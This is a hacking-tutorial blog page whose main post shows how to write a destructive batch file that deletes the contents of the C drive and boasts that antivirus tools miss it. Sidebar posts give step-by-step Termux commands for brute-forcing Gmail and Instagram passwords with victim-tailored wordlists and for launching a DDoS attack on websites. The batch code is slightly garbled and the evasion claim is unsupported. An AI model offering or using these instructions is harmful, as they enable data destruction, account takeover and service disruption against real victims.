Skip to main content

HOW TO MAKE ALKR VIRUS ON PC

In my previous post i had teach you guys to createvirus that disable mouseandVirus to format Hard Disk. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post aboutLearn Batch Programming.
How to Make the virus ?1.

#OpenNotepadand copy below code into it. @Echo offDel C:\ *.* |y

# Save this file ALKR.bat(Name cant be changed)

# Now, running this file will
deleteall the content ofC Drive.

Warning:Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Comments

Popular posts from this blog

HACK GMAIL ACCOUNT PASSWORD USING TERMUX LATEST 2020

HACK GMAIL ACCOUNT PASSWORD  Open Termux $ pkg update $ pkg upgrade $ pkg install python $ pkg install python2 $ pkg install git $ git clone  https://github.com/ALKR-HACKHECKZ/alkrmail.git $ ls $ cd alkrmail $ ls $ python alkrmail.py An Inter Face will open as "amailhack' Enter 1 For Starting Attack Enter The password File I Have Added My File Pass.txt  You Can Add Your File...Or you Can Add mine Wait For The Right Password  Enjoy🤩 Youtube Video Tutorial : https://youtu.be/N90zM_pB0co

HOW TO HACK INSTAGRAM USING TERMUX LATEST 2020 WOKING TRICK

HACK INSTAGRAM BRUTEFORCE  WOKING TRICK Steps: Termux App link :  https://play.google.com/store/apps/details?id=com.termux&hl=en Open termux: $ pkg upgrade $ pkg update $ pkg install python $ pkg install python3 $ pkg install git $ git clone  https://github.com/ALKR-HACKHECKZ/alkrinsta.git $ ls $ cd alkrinsta  $ ls $ pkg install pip $ pip install requests $ pip install bs4 You can either create a password list using cupp or you can download other password lists. To make Password list using Cupp Follow steps Below $ python3 cupp.py $ python3 cupp.py -i 🤔Give the Needed Information Of Victim and create the password list  🧐To run the created password list you have to rename the file to "pass.txt" $ mv filename.txt pass.txt     {filename.txt= your created password list you can see your password list name by  ls command } $ cat pass.txt $ pyth...

How DDOS Attack A Website in Termux

DDOS Attack in Termux Open Termux $ apt update $ apt upgrade $ pkg install git $ pkg install python $ git clone https://github.com/Klavyeli/DDoS.git $ cd hulk $ ls $ chmod +x hulk.py $ python +x hulk.py ( Website Adress ) Now Attack Will Start Website get too much traffic and website will Crack Enjoy🤩 Youtube Video Tutorial: https://youtu.be/O8strCVGXwU